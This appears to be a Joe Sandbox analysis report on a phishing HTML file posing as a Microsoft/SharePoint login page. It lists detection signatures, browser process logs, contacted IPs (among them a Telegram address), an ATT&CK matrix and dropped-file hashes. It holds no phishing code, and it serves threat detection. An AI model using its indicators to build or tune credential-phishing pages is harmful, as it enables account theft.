Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ScannedFileCopy8475.html

Overview

General Information

Sample Name:ScannedFileCopy8475.html
Analysis ID:831537
MD5:9a580f2e9f88aad5f60b02d775596e37
SHA1:f9b1a8953113077f96acb4264754e94964d14d43
SHA256:f31f1852b141c2680ada8b4b977b6cf150efbda99a584e858a21b332452f2626

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish10
Multi AV Scanner detection for submitted file
HTML document with suspicious title
HTML document with suspicious name
Phishing site detected (based on image similarity)
Invalid 'forgot password' link found
HTML body contains low number of good links
Invalid T&C link found
None HTTPS page querying sensitive user data (password, username or email)
No HTML title found

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Downloads\cmkLSRXxXD\ScannedFileCopy8475.html MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)
    • chrome.exe (PID: 6636 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1892,i,4439744641306001984,1519793728001864979,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 7BC7B4AEDC055BB02BCB52710132E9E1)
  • cleanup
SourceRuleDescriptionAuthorStrings
28499.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: ScannedFileCopy8475.htmlVirustotal: Detection: 13%Perma Link

    Phishing

    barindex
    Source: Yara matchFile source: 28499.0.pages.csv, type: HTML
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlMatcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlMatcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv 071B2B2BDAD25606
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlMatcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlMatcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv 071B2B2BDAD25606
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlMatcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlMatcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv 071B2B2BDAD25606
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlMatcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlMatcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv 071B2B2BDAD25606
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlMatcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlMatcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv 071B2B2BDAD25606
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlMatcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlMatcher: Found strong image similarity, brand: Microsoft image: 28499.img.0.gfk.csv 071B2B2BDAD25606
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlHTTP Parser: Invalid link: Forgot password?
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlHTTP Parser: Invalid link: Forgot password?
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlHTTP Parser: Number of links: 0
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlHTTP Parser: Number of links: 0
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlHTTP Parser: Invalid link: Terms of use
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlHTTP Parser: Invalid link: Privacy & cookies
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlHTTP Parser: Invalid link: Terms of use
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlHTTP Parser: Invalid link: Privacy & cookies
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlHTTP Parser: Has password / email / username input fields
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlHTTP Parser: Has password / email / username input fields
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlHTTP Parser: HTML title missing
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlHTTP Parser: HTML title missing
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlHTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlHTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlHTTP Parser: No <meta name="copyright".. found
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlHTTP Parser: No <meta name="copyright".. found
    Source: chrome.exeMemory has grown: Private usage: 8MB later: 24MB
    Source: unknownDNS traffic detected: queries for: clients2.google.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 20.224.254.73
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.32.24
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.32.24
    Source: unknownTCP traffic detected without corresponding DNS query: 20.224.254.73
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 149.154.167.220
    Source: unknownTCP traffic detected without corresponding DNS query: 149.154.167.220
    Source: unknownTCP traffic detected without corresponding DNS query: 149.154.167.220
    Source: unknownTCP traffic detected without corresponding DNS query: 149.154.167.220
    Source: unknownTCP traffic detected without corresponding DNS query: 149.154.167.220
    Source: unknownTCP traffic detected without corresponding DNS query: 149.154.167.220
    Source: unknownTCP traffic detected without corresponding DNS query: 149.154.167.220
    Source: unknownTCP traffic detected without corresponding DNS query: 149.154.167.220
    Source: unknownTCP traffic detected without corresponding DNS query: 149.154.167.220
    Source: unknownTCP traffic detected without corresponding DNS query: 149.154.167.220
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 34.117.59.81
    Source: unknownTCP traffic detected without corresponding DNS query: 149.154.167.220
    Source: unknownTCP traffic detected without corresponding DNS query: 149.154.167.220
    Source: unknownTCP traffic detected without corresponding DNS query: 149.154.167.220
    Source: unknownTCP traffic detected without corresponding DNS query: 149.154.167.220
    Source: unknownTCP traffic detected without corresponding DNS query: 149.154.167.220

    System Summary

    barindex
    Source: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmlTab title: Sharepoint
    Source: Name includes: ScannedFileCopy8475.htmlInitial sample: scanned
    Source: ScannedFileCopy8475.htmlVirustotal: Detection: 13%
    Source: classification engineClassification label: mal68.phis.winHTML@23/70@6/116
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Downloads\cmkLSRXxXD\ScannedFileCopy8475.html
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1892,i,4439744641306001984,1519793728001864979,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1892,i,4439744641306001984,1519793728001864979,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\System32 FullSizeInformation
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationPath Interception1
    Process Injection
    1
    Process Injection
    OS Credential Dumping1
    System Information Discovery
    Remote ServicesData from Local SystemExfiltration Over Other Network Medium2
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Extra Window Memory Injection
    1
    Extra Window Memory Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
    Non-Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
    Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    ScannedFileCopy8475.html14%VirustotalBrowse
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    accounts.google.com
    142.250.185.109
    truefalse
      high
      cs837.wac.edgecastcdn.net
      192.229.133.221
      truefalse
        high
        cs1227.wpc.alphacdn.net
        192.229.221.185
        truefalse
          unknown
          www.google.com
          142.250.185.68
          truefalse
            high
            upload.wikimedia.org
            91.198.174.208
            truefalse
              high
              part-0017.t-0009.fdv2-t-msedge.net
              13.107.237.45
              truefalse
                unknown
                clients.l.google.com
                142.250.186.142
                truefalse
                  high
                  clients2.google.com
                  unknown
                  unknownfalse
                    high
                    www.w3schools.com
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.htmltrue
                        low
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        142.250.185.109
                        accounts.google.comUnited States
                        15169GOOGLEUSfalse
                        142.250.185.228
                        unknownUnited States
                        15169GOOGLEUSfalse
                        152.199.19.160
                        unknownUnited States
                        15133EDGECASTUSfalse
                        20.189.173.2
                        unknownUnited States
                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                        2.16.241.4
                        unknownEuropean Union
                        20940AKAMAI-ASN1EUfalse
                        20.190.159.64
                        unknownUnited States
                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                        149.154.167.220
                        unknownUnited Kingdom
                        62041TELEGRAMRUfalse
                        142.250.185.163
                        unknownUnited States
                        15169GOOGLEUSfalse
                        2.19.85.129
                        unknownEuropean Union
                        20940AKAMAI-ASN1EUfalse
                        34.104.35.123
                        unknownUnited States
                        15169GOOGLEUSfalse
                        20.224.254.73
                        unknownUnited States
                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                        184.30.21.171
                        unknownUnited States
                        16625AKAMAI-ASUSfalse
                        34.117.59.81
                        unknownUnited States
                        139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                        91.198.174.208
                        upload.wikimedia.orgNetherlands
                        14907WIKIMEDIAUSfalse
                        20.190.159.73
                        unknownUnited States
                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                        2.19.84.107
                        unknownEuropean Union
                        20940AKAMAI-ASN1EUfalse
                        192.229.133.221
                        cs837.wac.edgecastcdn.netUnited States
                        15133EDGECASTUSfalse
                        52.109.32.24
                        unknownUnited States
                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                        239.255.255.250
                        unknownReserved
                        unknownunknownfalse
                        192.229.221.185
                        cs1227.wpc.alphacdn.netUnited States
                        15133EDGECASTUSfalse
                        13.107.237.45
                        part-0017.t-0009.fdv2-t-msedge.netUnited States
                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                        142.250.186.142
                        clients.l.google.comUnited States
                        15169GOOGLEUSfalse
                        192.229.221.95
                        unknownUnited States
                        15133EDGECASTUSfalse
                        IP
                        127.0.0.1
                        Joe Sandbox Version:37.0.0 Beryl
                        Analysis ID:831537
                        Start date and time:2023-03-21 15:41:20 +01:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                        Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
                        Number of analysed new started processes analysed:5
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:1
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • EGA enabled
                        Analysis Mode:stream
                        Analysis stop reason:Timeout
                        Sample file name:ScannedFileCopy8475.html
                        Detection:MAL
                        Classification:mal68.phis.winHTML@23/70@6/116
                        Cookbook Comments:
                        • Found application associated with file extension: .html
                        • Exclude process from analysis (whitelisted): SIHClient.exe
                        • Excluded IPs from analysis (whitelisted): 142.250.185.163, 34.104.35.123
                        • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • VT rate limit hit for: cs1227.wpc.alphacdn.net
                        • VT rate limit hit for: file:///C:/Users/user/Downloads/cmkLSRXxXD/ScannedFileCopy8475.html
                        • VT rate limit hit for: part-0017.t-0009.fdv2-t-msedge.net
                        File Type:data
                        Category:dropped
                        Size (bytes):12582
                        Entropy (8bit):3.3663352620841924
                        Encrypted:false
                        SSDEEP:
                        MD5:D4723DB381C386E8CDFC08095E805DC8
                        SHA1:A8EF4CAD168FE10767D768317CE8AE8B39D23A1E
                        SHA-256:DA791FF776D329234D63DCEEC4C2E94EDAC460E382F5F2D5F789C32E9265C372
                        SHA-512:622F96E3526D3E5E629EEDBF0057EF931A94598BCFD7510B3B3044FC115F32CAF05B59D035CDA224382B9674C465B6BD910259AF7C9D2428C81F9CF4CA674FF4
                        Malicious:false
                        Reputation:low
                        Preview:.....AAAAAAA...A&AAA.d.A.A.A%ALAAA.AAAAAAA.6#.tA.ntA...A...6..LA..bA...A...A6#.A..bA...A.bbAb..A...A...A6!.A*.HA..bA.w.A..bA.w#A..bA.SAA.AbA.S.A.6?.AA.AAA..AAAAAAV.AA6AAA..AAbAAA..AA.AAA?A.A!AAAQA.AnAAA.A.A.AAA.A.A.AAA..AA]AAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6.AV.AAwAAAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.A?.AA.AAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.A..AA.AAAA6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.A..AA-AAAL6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.A?A.A.AAA.6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&6AAAAAAAAAAA.LQA.A.AAA.6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.6AAAAAAAAAAA.L.A.AZAAAX6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.6AAAAAAAAAAA.L.A.ApAAAA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL.AAAAAAAAAAA.LcA.A~ALA.AwALA.AxA.A.A.A.A,ALA.AJA.AJALAwApA.A.A.A.AJA.A.A.ALA.A.A.A.A.A.A.A.ALA.A.AJA.A.A.ALAUA.A.A.A.A.ALA8A.A.A.A.A.A.A|AKA.A.A.A.A.AQA.A.A.A.A.A.A.A.A|AKA.A.A.AYApA:A.A.A.A.A.AxA.A.A.A.A,A.A.A.AYApA:A.A.A.A.A.A.AYA.A.A.A.A.A.AJA.A.A.A.AxA.A.A.A.A,A.A.A.A.AYA.A.A.A.A.A.A.A.A.AQA.A:A.
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                        Category:dropped
                        Size (bytes):1057
                        Entropy (8bit):7.6851406288304105
                        Encrypted:false
                        SSDEEP:
                        MD5:ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
                        SHA1:ECA56C4904354EED5DA0DEBCD6BD66856AB4784D
                        SHA-256:F664B8138C2DA6EC7565500A7CC839DA6372614A31DC04C5A2169A26B8D9767C
                        SHA-512:3BFB696318DDB93540140DBCD4DBB32F129441E46EE752C6B7379624488533BA27CC7EFF3CAE444C1797CA6EECDF333EDAF443AC84CDEB037A890967091CF91C
                        Malicious:false
                        Reputation:low
                        Preview:.PNG........IHDR...l.................pHYs...........~.....IDATh..XMN.P..\.E......' ,.-.$'.H....s...1.vQ.......4.........-.<......{..|.?.w[4....A.=h<>.......7..t.u..]A{..&...,..h.`D4.01]......H.&..C.w...@....*..a..3..H.aR.=.g.(.0.6...;Wl...X.X..G.Bf.....D4...K..p... ..hh.-b.R.Z....Z..zYQc}....u^..R.Dzm$..%c".....C.*z.\&U9P..0.3s*..31..@...W..2....yG.....c)k.F....3.I!....2..F.....`%1.....-..U.s(.p..S.($/...}(.5.\"k.+.I.Q...cb....kt..o.`.........%L....;.J.[..b.xx)c,X7.....)..'.n..H=E<.B.].g.}f.o...........znJ.....Q$....7...#.&..g.D..X....F..~=...%IQ.........e.....>.R..............s..[.D|l.n&..a06..d.5.5YGC..3N......<..Pt..\<{b...i.....)!.....8...0.t_.....8..T.......)G.-mzK....../..TDK..k..s"ch.0....i..`...`V..H.Q"...x......!.."..Q..%3O.L.....$....e.s.m..||.......AD."...#.%b,'..r!.}c...X!2kCD6..iX.\@S..3Er....B...D...%.O...(._...-....{b......z........r.N..W2....L.1~-.J.?.l....?..q:..W.5&.....|..>.B...G.oa.S.....1......Zo...q.....
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:SVG Scalable Vector Graphics image
                        Category:dropped
                        Size (bytes):513
                        Entropy (8bit):4.720499940334011
                        Encrypted:false
                        SSDEEP:
                        MD5:A9CC2824EF3517B6C4160DCF8FF7D410
                        SHA1:8DB9AEBAD84CA6E4225BFDD2458FF3821CC4F064
                        SHA-256:34F9DB946E89F031A80DFCA7B16B2B686469C9886441261AE70A44DA1DFA2D58
                        SHA-512:AA3DDAB0A1CFF9533F9A668ABA4FB5E3D75ED9F8AFF8A1CAA4C29F9126D85FF4529E82712C0119D2E81035D1CE1CC491FF9473384D211317D4D00E0E234AD97F
                        Malicious:false
                        Reputation:low
